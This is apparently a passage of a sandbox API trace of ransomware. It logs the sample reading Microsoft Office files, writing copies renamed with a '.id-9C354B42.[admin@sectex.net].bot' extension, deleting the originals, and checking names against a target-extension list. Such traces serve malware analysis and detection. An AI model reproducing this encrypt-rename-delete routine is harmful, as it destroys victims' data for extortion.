	[0159.133] CloseHandle (hObject=0x3c4) returned 1
	[0159.133] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\oltask.fae")) returned 0x20
	[0159.133] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\oltask.fae.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\oltask.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0159.133] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.133] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\oltask.fae.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0159.134] GetLastError () returned 0x0
	[0159.134] ReadFile (in: hFile=0x3c4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x1c398, lpOverlapped=0x0) returned 1
	[0159.138] WriteFile (in: hFile=0x37c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x1c3a0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x1c3a0, lpOverlapped=0x0) returned 1
	[0159.141] ReadFile (in: hFile=0x3c4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.141] WriteFile (in: hFile=0x37c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0159.141] SetEndOfFile (hFile=0x37c) returned 1
	[0159.141] CloseHandle (hObject=0x37c) returned 1
	[0159.141] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.141] SetEndOfFile (hFile=0x3c4) returned 1
	[0159.145] CloseHandle (hObject=0x3c4) returned 1
	[0159.145] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.145] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\oltask.fae")) returned 1
	[0159.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE") returned 61
	[0159.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE") returned 61
	[0159.146] lstrlenW (lpString=".doc") returned 4
	[0159.146] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0159.146] lstrlenW (lpString=".docx") returned 5
	[0159.146] lstrcmpiW (lpString1=".docx", lpString2="K.FAE") returned -1
	[0159.146] lstrlenW (lpString=".pdf") returned 4
	[0159.146] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0159.146] lstrlenW (lpString=".xls") returned 4
	[0159.146] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0159.146] lstrlenW (lpString=".xlsx") returned 5
	[0159.146] lstrcmpiW (lpString1=".xlsx", lpString2="K.FAE") returned -1
	[0159.146] lstrlenW (lpString=".ppt") returned 4
	[0159.146] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0159.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE") returned 61
	[0159.146] lstrlenW (lpString=".zip") returned 4
	[0159.146] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0159.146] lstrlenW (lpString=".rar") returned 4
	[0159.146] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0159.146] lstrlenW (lpString=".bz2") returned 4
	[0159.147] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0159.147] lstrlenW (lpString=".7z") returned 3
	[0159.147] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0159.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE") returned 61
	[0159.147] lstrlenW (lpString=".dbf") returned 4
	[0159.147] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0159.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE") returned 61
	[0159.147] lstrlenW (lpString=".1cd") returned 4
	[0159.147] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0159.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE") returned 61
	[0159.147] lstrlenW (lpString=".jpg") returned 4
	[0159.147] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0159.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE") returned 61
	[0159.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE") returned 61
	[0159.147] lstrlenW (lpString=".doc") returned 4
	[0159.147] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0159.147] lstrlenW (lpString=".docx") returned 5
	[0159.147] lstrcmpiW (lpString1=".docx", lpString2="K.FAE") returned -1
	[0159.147] lstrlenW (lpString=".pdf") returned 4
	[0159.147] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0159.147] lstrlenW (lpString=".xls") returned 4
	[0159.147] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0159.147] lstrlenW (lpString=".xlsx") returned 5
	[0159.147] lstrcmpiW (lpString1=".xlsx", lpString2="K.FAE") returned -1
	[0159.147] lstrlenW (lpString=".ppt") returned 4
	[0159.147] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0159.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE") returned 61
	[0159.147] lstrlenW (lpString=".zip") returned 4
	[0159.147] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0159.147] lstrlenW (lpString=".rar") returned 4
	[0159.147] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0159.148] lstrlenW (lpString=".bz2") returned 4
	[0159.148] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0159.148] lstrlenW (lpString=".7z") returned 3
	[0159.148] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0159.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE") returned 61
	[0159.148] lstrlenW (lpString=".dbf") returned 4
	[0159.148] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0159.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE") returned 61
	[0159.148] lstrlenW (lpString=".1cd") returned 4
	[0159.148] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0159.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLTASK.FAE") returned 61
	[0159.148] lstrlenW (lpString=".jpg") returned 4
	[0159.148] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0159.148] lstrcmpiW (lpString1=".SAM", lpString2=".bot") returned 1
	[0159.148] lstrlenW (lpString="ORG97.SAM") returned 9
	[0159.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\org97.sam"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0159.149] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=50568) returned 1
	[0159.149] CloseHandle (hObject=0x3c4) returned 1
	[0159.149] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\org97.sam")) returned 0x20
	[0159.149] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\org97.sam.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\org97.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0159.150] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.150] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\org97.sam.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0159.150] GetLastError () returned 0x0
	[0159.150] ReadFile (in: hFile=0x3c4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xc588, lpOverlapped=0x0) returned 1
	[0159.427] WriteFile (in: hFile=0x37c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xc590, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xc590, lpOverlapped=0x0) returned 1
	[0159.428] ReadFile (in: hFile=0x3c4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.429] WriteFile (in: hFile=0x37c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0159.429] SetEndOfFile (hFile=0x37c) returned 1
	[0159.588] CloseHandle (hObject=0x37c) returned 1
	[0159.588] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.588] SetEndOfFile (hFile=0x3c4) returned 1
	[0159.615] CloseHandle (hObject=0x3c4) returned 1
	[0159.615] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.714] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\org97.sam")) returned 1
	[0159.929] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM") returned 60
	[0159.929] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM") returned 60
	[0159.929] lstrlenW (lpString=".doc") returned 4
	[0159.929] lstrcmpiW (lpString1=".doc", lpString2=".SAM") returned -1
	[0159.929] lstrlenW (lpString=".docx") returned 5
	[0159.929] lstrcmpiW (lpString1=".docx", lpString2="7.SAM") returned -1
	[0159.929] lstrlenW (lpString=".pdf") returned 4
	[0159.929] lstrcmpiW (lpString1=".pdf", lpString2=".SAM") returned -1
	[0159.929] lstrlenW (lpString=".xls") returned 4
	[0159.929] lstrcmpiW (lpString1=".xls", lpString2=".SAM") returned 1
	[0159.929] lstrlenW (lpString=".xlsx") returned 5
	[0159.929] lstrcmpiW (lpString1=".xlsx", lpString2="7.SAM") returned -1
	[0159.929] lstrlenW (lpString=".ppt") returned 4
	[0159.929] lstrcmpiW (lpString1=".ppt", lpString2=".SAM") returned -1
	[0159.929] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM") returned 60
	[0159.929] lstrlenW (lpString=".zip") returned 4
	[0159.929] lstrcmpiW (lpString1=".zip", lpString2=".SAM") returned 1
	[0159.929] lstrlenW (lpString=".rar") returned 4
	[0159.929] lstrcmpiW (lpString1=".rar", lpString2=".SAM") returned -1
	[0159.929] lstrlenW (lpString=".bz2") returned 4
	[0159.929] lstrcmpiW (lpString1=".bz2", lpString2=".SAM") returned -1
	[0159.929] lstrlenW (lpString=".7z") returned 3
	[0159.929] lstrcmpiW (lpString1=".7z", lpString2="SAM") returned -1
	[0159.929] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM") returned 60
	[0159.930] lstrlenW (lpString=".dbf") returned 4
	[0159.930] lstrcmpiW (lpString1=".dbf", lpString2=".SAM") returned -1
	[0159.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM") returned 60
	[0159.930] lstrlenW (lpString=".1cd") returned 4
	[0159.930] lstrcmpiW (lpString1=".1cd", lpString2=".SAM") returned -1
	[0159.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM") returned 60
	[0159.930] lstrlenW (lpString=".jpg") returned 4
	[0159.930] lstrcmpiW (lpString1=".jpg", lpString2=".SAM") returned -1
	[0159.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM") returned 60
	[0159.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM") returned 60
	[0159.930] lstrlenW (lpString=".doc") returned 4
	[0159.930] lstrcmpiW (lpString1=".doc", lpString2=".SAM") returned -1
	[0159.930] lstrlenW (lpString=".docx") returned 5
	[0159.930] lstrcmpiW (lpString1=".docx", lpString2="7.SAM") returned -1
	[0159.930] lstrlenW (lpString=".pdf") returned 4
	[0159.930] lstrcmpiW (lpString1=".pdf", lpString2=".SAM") returned -1
	[0159.930] lstrlenW (lpString=".xls") returned 4
	[0159.930] lstrcmpiW (lpString1=".xls", lpString2=".SAM") returned 1
	[0159.930] lstrlenW (lpString=".xlsx") returned 5
	[0159.930] lstrcmpiW (lpString1=".xlsx", lpString2="7.SAM") returned -1
	[0159.930] lstrlenW (lpString=".ppt") returned 4
	[0159.930] lstrcmpiW (lpString1=".ppt", lpString2=".SAM") returned -1
	[0159.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM") returned 60
	[0159.930] lstrlenW (lpString=".zip") returned 4
	[0159.930] lstrcmpiW (lpString1=".zip", lpString2=".SAM") returned 1
	[0159.930] lstrlenW (lpString=".rar") returned 4
	[0159.930] lstrcmpiW (lpString1=".rar", lpString2=".SAM") returned -1
	[0159.930] lstrlenW (lpString=".bz2") returned 4
	[0159.930] lstrcmpiW (lpString1=".bz2", lpString2=".SAM") returned -1
	[0159.930] lstrlenW (lpString=".7z") returned 3
	[0159.931] lstrcmpiW (lpString1=".7z", lpString2="SAM") returned -1
	[0159.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM") returned 60
	[0159.931] lstrlenW (lpString=".dbf") returned 4
	[0159.931] lstrcmpiW (lpString1=".dbf", lpString2=".SAM") returned -1
	[0159.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM") returned 60
	[0159.931] lstrlenW (lpString=".1cd") returned 4
	[0159.931] lstrcmpiW (lpString1=".1cd", lpString2=".SAM") returned -1
	[0159.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ORG97.SAM") returned 60
	[0159.931] lstrlenW (lpString=".jpg") returned 4
	[0159.931] lstrcmpiW (lpString1=".jpg", lpString2=".SAM") returned -1
	[0159.931] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0159.931] lstrlenW (lpString="ACTIVITL.ICO") returned 12
	[0159.931] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\activitl.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0159.954] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1078) returned 1
	[0159.954] CloseHandle (hObject=0x3d0) returned 1
	[0159.954] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\activitl.ico")) returned 0x20
	[0159.960] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\activitl.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\activitl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0159.960] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.960] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\activitl.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0160.156] GetLastError () returned 0x0
	[0160.156] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x436, lpOverlapped=0x0) returned 1
	[0160.163] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x440, lpOverlapped=0x0) returned 1
	[0160.164] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.164] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.164] SetEndOfFile (hFile=0x398) returned 1
	[0160.165] CloseHandle (hObject=0x398) returned 1
	[0160.165] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.165] SetEndOfFile (hFile=0x3f0) returned 1
	[0160.175] CloseHandle (hObject=0x3f0) returned 1
	[0160.176] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.181] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\activitl.ico")) returned 1
	[0160.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITL.ICO") returned 66
	[0160.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITL.ICO") returned 66
	[0160.185] lstrlenW (lpString=".doc") returned 4
	[0160.185] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.185] lstrlenW (lpString=".docx") returned 5
	[0160.185] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0160.185] lstrlenW (lpString=".pdf") returned 4
	[0160.185] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.185] lstrlenW (lpString=".xls") returned 4
	[0160.185] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.185] lstrlenW (lpString=".xlsx") returned 5
	[0160.185] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0160.185] lstrlenW (lpString=".ppt") returned 4
	[0160.185] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITL.ICO") returned 66
	[0160.185] lstrlenW (lpString=".zip") returned 4
	[0160.185] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.185] lstrlenW (lpString=".rar") returned 4
	[0160.185] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.185] lstrlenW (lpString=".bz2") returned 4
	[0160.185] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.185] lstrlenW (lpString=".7z") returned 3
	[0160.185] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITL.ICO") returned 66
	[0160.185] lstrlenW (lpString=".dbf") returned 4
	[0160.185] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITL.ICO") returned 66
	[0160.185] lstrlenW (lpString=".1cd") returned 4
	[0160.185] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITL.ICO") returned 66
	[0160.185] lstrlenW (lpString=".jpg") returned 4
	[0160.185] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITL.ICO") returned 66
	[0160.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITL.ICO") returned 66
	[0160.186] lstrlenW (lpString=".doc") returned 4
	[0160.186] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.186] lstrlenW (lpString=".docx") returned 5
	[0160.186] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0160.186] lstrlenW (lpString=".pdf") returned 4
	[0160.186] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.186] lstrlenW (lpString=".xls") returned 4
	[0160.186] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.186] lstrlenW (lpString=".xlsx") returned 5
	[0160.186] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0160.186] lstrlenW (lpString=".ppt") returned 4
	[0160.186] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITL.ICO") returned 66
	[0160.186] lstrlenW (lpString=".zip") returned 4
	[0160.186] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.186] lstrlenW (lpString=".rar") returned 4
	[0160.186] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.186] lstrlenW (lpString=".bz2") returned 4
	[0160.186] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.186] lstrlenW (lpString=".7z") returned 3
	[0160.186] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITL.ICO") returned 66
	[0160.186] lstrlenW (lpString=".dbf") returned 4
	[0160.186] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITL.ICO") returned 66
	[0160.186] lstrlenW (lpString=".1cd") returned 4
	[0160.186] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITL.ICO") returned 66
	[0160.186] lstrlenW (lpString=".jpg") returned 4
	[0160.186] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.187] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0160.187] lstrlenW (lpString="APPTL.ICO") returned 9
	[0160.187] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\apptl.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.196] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1078) returned 1
	[0160.197] CloseHandle (hObject=0x3f0) returned 1
	[0160.197] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\apptl.ico")) returned 0x20
	[0160.197] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPTL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\apptl.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
